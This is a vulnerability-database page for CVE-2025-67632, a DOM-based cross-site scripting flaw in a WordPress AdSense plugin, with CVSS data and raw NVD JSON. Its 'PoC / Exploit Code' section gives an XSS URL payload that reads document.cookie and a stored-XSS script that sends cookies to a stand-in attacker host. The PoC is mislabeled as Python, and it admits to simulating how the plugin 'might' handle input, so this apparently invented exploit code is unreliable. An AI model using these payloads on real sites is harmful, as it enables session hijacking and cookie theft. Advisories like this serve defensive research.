Security Vulnerability Report
中文
CVE-2025-67632 CVSS 5.9 MEDIUM

CVE-2025-67632

Published: 2025-12-24 13:16:19
Last Modified: 2026-04-28 19:35:40

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in The Plugin Factory Google AdSense for Responsive Design – GARD google-adsense-for-responsive-design-gard allows DOM-Based XSS.This issue affects Google AdSense for Responsive Design – GARD: from n/a through <= 2.23.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Google AdSense for Responsive Design – GARD (google-adsense-for-responsive-design-gard) <= 2.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-67632 DOM-based XSS PoC --> <!-- This PoC demonstrates the DOM-based XSS vulnerability in GARD plugin --> <!-- Method 1: URL-based injection --> <script> // PoC for DOM-based XSS in GARD plugin // Attackers can inject malicious scripts through URL parameters // Simulate the vulnerable code pattern function vulnerableGARDHandler() { // This simulates how the plugin might process user input var userInput = location.href.split('?')[1]; var parsedParams = new URLSearchParams(userInput); var adSlot = parsedParams.get('ad_slot'); // Vulnerable: Direct insertion without sanitization document.getElementById('gad-container').innerHTML = adSlot; } // Trigger the vulnerability vulnerableGARDHandler(); </script> <!-- Method 2: Malicious URL that could trigger the vulnerability --> <!-- http://[target-site]/?ad_slot=<img src=x onerror=alert(document.cookie)> --> <!-- Method 3: Stored XSS trigger via plugin settings --> <!-- Attackers with high privileges can inject: <script>fetch('https://attacker.com/steal?c='+document.cookie)</script> into plugin settings that are later rendered unsanitized. -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67632", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:19.430", "lastModified": "2026-04-28T19:35:39.907", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in The Plugin Factory Google AdSense for Responsive Design – GARD google-adsense-for-responsive-design-gard allows DOM-Based XSS.This issue affects Google AdSense for Responsive Design – GARD: from n/a through <= 2.23."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/google-adsense-for-responsive-design-gard/vulnerability/wordpress-google-adsense-for-responsive-design-gard-plugin-2-23-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}